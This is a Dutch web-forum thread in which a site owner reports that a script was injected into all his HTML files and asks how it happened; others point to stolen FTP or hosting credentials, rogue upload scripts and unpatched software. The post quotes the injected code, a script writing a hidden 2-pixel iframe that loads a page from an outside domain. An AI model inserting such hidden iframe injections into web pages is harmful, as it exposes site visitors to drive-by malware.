Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Malware in website

Pagina: 1
Acties:

Verwijderd

Topicstarter
Hallo,

Ik heb even een vraag betreft een website die ik zelf heb opgebouwd.
Deze is sinds een maand of 2 online en begin wat last te krijgen van Malware op die website.

Onlangs zat "plots" volgende code :
code:
1
2
3
<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://interviewerbacklit.org/news.php?id=e6f6402caf60df3a" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

in al men HTML bestanden en ik weet niet direct hoe ik het kan tegenhouden. Ik heb direct een backup terug geplaatst en (logisch) alles werkte terug perfect.

Heeft iemand enig idee hoe het komt dat dit bovenaan men body terecht komt? en nog beter hoe ik het in de toekomst kan vermijden?

Geluk dat ik het zeer vlug heb ontdekt want plots komt je website op een blacklist te staan bij oa Google en dan is die plots niet meer bereikbaar.

Alvast bedankt
Mvg
Peter

• Rmg
  • Registratie: November 2003
  • Laatst online: 20:37

Rmg

Ik zou iig je inloggegevens veranderen bij je hoster. En verder checken of je geen rare php uploadscriptjes kan vinden.

• CodeCaster
  • Registratie: Juni 2003
  • Niet online

CodeCaster

Can I get uhm...

Zulke injecties in je bestanden worden meestal veroorzaakt door een misbruikt FTP-account. Controleer even alle PC's waarop je een FTP-verbinding hebt gemaakt naar je site op malware zoals keyloggers. :)

https://oneerlijkewoz.nl
Op papier is hij aan het tekenen, maar in de praktijk...

• NMe
  • Registratie: Februari 2004
  • Laatst online: 20-11 11:59

NMe

Quia Ego Sic Dico.

Er zijn letterlijk tientallen manieren waarop dit kan gebeuren. Bekende exploits in slecht bijgehouden third party software. Zelfgeschreven lekken in allerlei soorten en maten. Een slecht geconfigureerde webserver die ervoor zorgt dat een andere site op de server jouw site kan infecteren. Een gelekt wachtwoord voor je FTP die vervolgens gewoon handmatig misbruikt is. Je hoster kan je hier meer informatie over geven, wij niet. ;)

Dit is sowieso meer iets voor de mensen in Beveiliging & Virussen.

WEB >> BV

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.